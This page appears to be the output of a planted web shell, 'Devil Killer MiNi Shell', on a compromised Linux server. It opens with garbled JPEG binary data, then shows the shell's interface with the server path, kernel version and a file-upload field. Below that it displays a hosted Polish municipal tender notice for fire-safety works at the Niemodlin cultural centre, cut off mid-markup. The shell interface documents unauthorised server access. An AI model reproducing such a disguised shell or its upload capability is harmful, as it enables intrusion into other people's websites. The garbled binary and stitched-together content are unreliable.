JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220511/0015317701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Dostosowanie widowni i sceny Ośrodka Kultury w Niemodlinie do wymogów ppoż.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Niemodlin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413194</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohaterów Powstań Śląskich 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Niemodlin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">49-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@niemodlin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.niemodlin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostosowanie widowni i sceny Ośrodka Kultury w Niemodlinie do wymogów ppoż.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f2c22b52-d0fc-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00153177</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00011887/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Dostosowanie widowni i sceny Ośrodka Kultury w Niemodlinie do wymogów ppoż.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/niemodlin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/niemodlin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/niemodlin<br/>2.W sytuacjach awaryjnych w szczególności w przypadku braku działania platformy zakupowej Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej (z wyłączeniem złożenia oferty,dla której jedynym dopuszczalnym sposobem złożenia jest przesłanie jej za pośrednictwem<br/>Platformy Zakupowej).W takim przypadku komunikacja odbywa się za pomocą adresu: zamowienia@niemodlin.pl<br/>3.Komunikacja między Zamawiającym a Wykonawcami,w tym wszelkie<br/>Oświadczenia,wnioski,zawiadomienia oraz informacje,przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do Zamawiającego”. Za datę przekazania(wpływu) ww. dokumentów przyjmuje się datę ich przesłania za pośrednictwem<br/>platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi się komunikat,że wiadomość została wysłana do Zamawiającego.<br/>4.Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl<br/>poprzez zamieszczenie ich na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca,będzie przekazywana za<br/>pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy.<br/>5.Zamawiający, zgodnie z Rozp. Prezesa RM z dn. 30.12.2020 w sprawie sposobu sporządzania i przekazywania... (Dz.U. z 2020r. poz. 2452),określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformazakupowa.pl,tj.:<br/>-stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>-komputer klasy PC lub MAC o następującej konfiguracji: pamięć min.2 GB Ram,procesor Intel IV 2 GHZ lub jego nowsza wersja,jeden z systemów operacyjnych - MS Windows 7,Mac Os x 10<br/>4,Linux,lub ich nowsze wersje,<br/>-zainstalowana dowolna przeglądarka internetowa,w przypadku Internet Explorer minimalnie wersja 10<br/>0.,<br/>-włączona obsługa JavaScript,<br/>-zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>-Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>-oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>5. Zamawiający informuje,że instrukcje korzystania z platformazakupowa.pl znajdują się w zakładce<br/>„Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>6.Zalecenia:<br/>-formaty plików wykorzystywanych przez wykonawców powinny być zgodne z “Obw. Prezesa RM z dn.9.11.2017 w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”,<br/>-Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf,<br/>-w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>.zip ; .7Z<br/>-wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages.Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie<br/>-Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym,który wynosi max 10MB,oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB<br/>-ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu,zamawiający zaleca,w miarę możliwości,przekonwertowanie plików składających się na ofertę<br/>na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem danych osobowych jest Burmistrz Niemodlina z siedzibą przy ul. Bohaterów Powstań Śląskich 37, 49 - 100 Niemodlin;<br/>2. w sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych należy kontaktować się z Inspektorem Ochrony Danych przez e-mail: iod@niemodlin.pl lub na adres: Urząd Miejski w Niemodlinie, Inspektor Ochrony Danych, ul. Bohaterów Powstań Śląskich 37 , 49-100 Niemodlin;<br/>3. dane osobowe przetwarzane będą w celu przeprowadzenia niniejszego postępowania o udzielenie zamówienia publicznego, udzielenia zamówienia, prowadzenia dokumentacji księgowo-podatkowej, archiwizacji danych oraz dochodzenia roszczeń lub obrony przed roszczeniami.<br/>4.Podstawą przetwarzania danych osobowych jest:<br/>1) ustawa z 11.09.2019 r. – Prawo zamówień publicznych;<br/>2) ustawa z 27.08.2009 r. o finansach publicznych;<br/>3) ustawa z 14.07.1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>4) art. 6 pkt.1 lit. c RODO – przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego<br/>ciążącego na administratorze.<br/>5. Odbiorcami Pani/Pana danych osobowych będą podmioty upoważnione na podstawie zawartych umów powierzenia oraz uprawnione na mocy obowiązujących przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania na podstawie art. 18 oraz art. 74-76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6. Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania oraz przez okres wynikający z przepisów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, w<br/>szczególności zgodnie art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata – przez cały okres obowiązywania umowy.<br/>7. Posiada Pani/Pan prawo do:<br/>1) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub<br/>daty zakończonego postępowania o udzielenie zamówienia;<br/>2) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie tego obowiązku nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>3) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do celów, w których zostały zebrane, lub w inny sposób przetwarzane;<br/>4) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. 3 ustawy Pzp wykonanie tego obowiązku nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.<br/>5) wniesienia skargi do organu nadzorczego, tj. Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-913 Warszawa</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8. Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9. Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu.<br/>10. Pani/Pana dane osobowe nie będą przekazywane do państw trzecich.<br/>11. Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach Pzp, związanych z udziałem w postępowaniu o udzielenie zamówienia; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>12. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGK.271.5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przebudowa widowni, sceny i pom. kieszeni sceny w budynku Ośrodka Kultury w Niemodlinie w celu zapewnienia bezpieczeństwa ppoż., zgodnie z dokumentacją projektową o której mowa w ust. 2. Dokumenty te stanowią załączniki do niniejszej SWZ.<br/>Inwestycja realizowana jest w ramach operacji dofinansowanej z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych i podlegającej wymogom wynikającym z regulaminu oraz zasad programu, w trybie powyżej 12 miesięcy (dla jednej umowy).<br/>2.	Szczegółowy opis przedmiotu zamówienia stanowi:<br/>1)	dokumentacja projektowa w skład której wchodzi:<br/>a)	projekt budowlany - architektura;<br/>b)	projekt budowlany – elektroakustyka;<br/>c)	projekt budowlany – elektryka;<br/>d)	projekt budowlany – mechanika sceniczna<br/>e)	projekt oświetlenia technologicznego i multimediów<br/>f)	specyfikacje techniczne wykonania i odbioru robót;<br/>g)	inwentaryzacja;<br/>h)	wytyczne akustyczne;<br/>i) przedmiary robót - (UWAGA: stanowią one dokument wyłącznie pomocniczy);<br/>zwana dalej „dokumentacją projektową”;<br/>2)	załącznik nr 9 – opis przedmiotu zamówienia;<br/>3)	projektowane postanowienia umowy stanowiące załącznik nr 8 do SWZ. <br/>3.	Prace budowlane będą wykonywane na czynnym w użytkowaniu obiekcie kultury. Wykonawca, ze względów bezpieczeństwa, winien zabezpieczyć obszar potencjalnego oddziaływania robót. Termin i czas wykonywania prac mogących stwarzać uciążliwość dla użytkowników obiektu, winien być skonsultowany z dyrektorem obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45237000-7 - Roboty budowlane w zakresie scen</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45323000-7 - Roboty w zakresie izolacji dźwiękoszczelnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">32000000-3 - Sprzęt radiowy, telewizyjny, komunikacyjny, telekomunikacyjny i podobny</p> <p class="mb-0">32340000-8 - Mikrofony i głośniki</p> <p class="mb-0">32351000-8 - Akcesoria do sprzętu dźwiękowego i wideo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w niniejszej SWZ, tj.:<br/>1) cena – waga 60 %<br/>2) okres gwarancji na sprzęt elektroniczny – 20%<br/>3) parametry techniczne – 20% <br/>Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się kryteriami, które mają przypisana WAGĘ w skali od 0-100 wskazanymi jw.<br/>2. Sposób oceny ofert:<br/>Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) Kryterium „Cena” – maksymalna ilość punktów: 60<br/>Ocenie w ramach kryterium „cena” podlegać będzie całkowite wynagrodzenie ryczałtowe brutto podane w formularzu oferty.<br/>Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona wg poniższego wzoru:<br/>Pc = (Cn / Cb)*100 punktów*60%<br/>gdzie: <br/>Pc – liczba punktów przyznana w kryterium ceny,<br/>Cn – najniższa cena spośród ofert nie odrzuconych,<br/>Cb – cena oferty badanej (rozpatrywanej).<br/>2) Kryterium „okres gwarancji na sprzęt elektroniczny” – maksymalna ilość punktów: 20. Ocenie w ramach kryterium „okres gwarancji na sprzęt elektroniczny” podlegać będzie liczba miesięcy wpisana przez Wykonawcę w formularzu oferty. Minimalny okres gwarancji, wymagany przez Zamawiającego wynosi 24 miesiące. <br/>Liczba punktów za to kryterium zostanie przyznana na podstawie wpisanej przez Wykonawcę w formularzu liczby miesięcy, w sposób następujący:<br/>- od 24 m-cy do 35 m-cy – 0 pkt<br/>- od 36 m-cy do 47 m-cy – 5 pkt<br/>- od 48 m-cy do 59 m-cy – 10 pkt<br/>- od 60 m-cy wzwyż – 20 pkt.<br/>W przypadku zaoferowania przez Wykonawcę długości gwarancji krótszego niż 24 miesiące, Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu gwarancji Zamawiający przyjmie, że Wykonawca oferuje minimalny okres gwarancji, tj. 24 miesiące.<br/>3)	Kryterium „parametry techniczne” – maksymalna ilość punktów: 20<br/>Ocenie w ramach kryterium „parametry techniczne” podlegać będzie informacja podana w poz. 1, 2, 13, 17, 20 i 63 Specyfikacji technicznej dla wybranych elementów przedmiotu zamówienia oferowanego przez Wykonawcę stanowiącego zał. do oferty - Przedmiotowy środek dowodowy (wzór stanowi zał. nr 1.1. do SWZ), która weryfikowana będzie na podstawie karty katalogowej dołączonej do oferty. Maksymalnie w ww. kryterium Wykonawca może otrzymać 20 pkt. <br/>Zamawiający przyzna ofercie Wykonawcy dodatkowe punkty za dostarczenie urządzeń o następujących parametrach technicznych i funkcjonalnych: <br/>I. Urządzenia oświetlenia technologicznego i multimediów:<br/>a) Poz. 1 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Reflektor Fresnel – punktacji podlega parametr CRI:<br/>- CRI ≤ 90 – 0 pkt.<br/>- CRI &gt; 90, &lt; 97 – 1 pkt<br/>- CRI ≥ 97 – 2 pkt.<br/>b) Poz. 2 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Głowica Wash - punktacji podlega ilość sterowanych niezależnie punktów świecących - sekcji lub pixeli:<br/>- Ilość punktów ≤ 19 – 0 pkt.<br/>- Ilość punktów ≥ 20, ≤ 36 – 1 pkt<br/>- Ilość punktów ≥ 37 – 2 pkt.<br/>c) Poz. 2 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Głowica Wash - punktacji podlega waga urządzenia:<br/>- Waga ≥ 24 kg – 0 pkt.<br/>- Waga &lt; 24 kg, &gt; 16 kg – 1 pkt<br/>- Waga ≤ 16 kg – 2 pkt.<br/>d) Poz. 2 w tabeli załącznika specyfikacja techniczna dla wybranych elementów przedmiotu zamówienia - Głowica Wash - punktacji podlega ilość złączy EtherCon:<br/>- Ilość złączy EtherCon = 1 – 0 pkt.<br/>- Ilość złączy EtherCon ≥ 2 – 2 pkt.<br/>3) ...<br/>dalsza część w SEKCJI IX – POZOSTAŁE INFORMACJE</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na sprzęt elektroniczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">parametry techniczne</span></h3> <h3 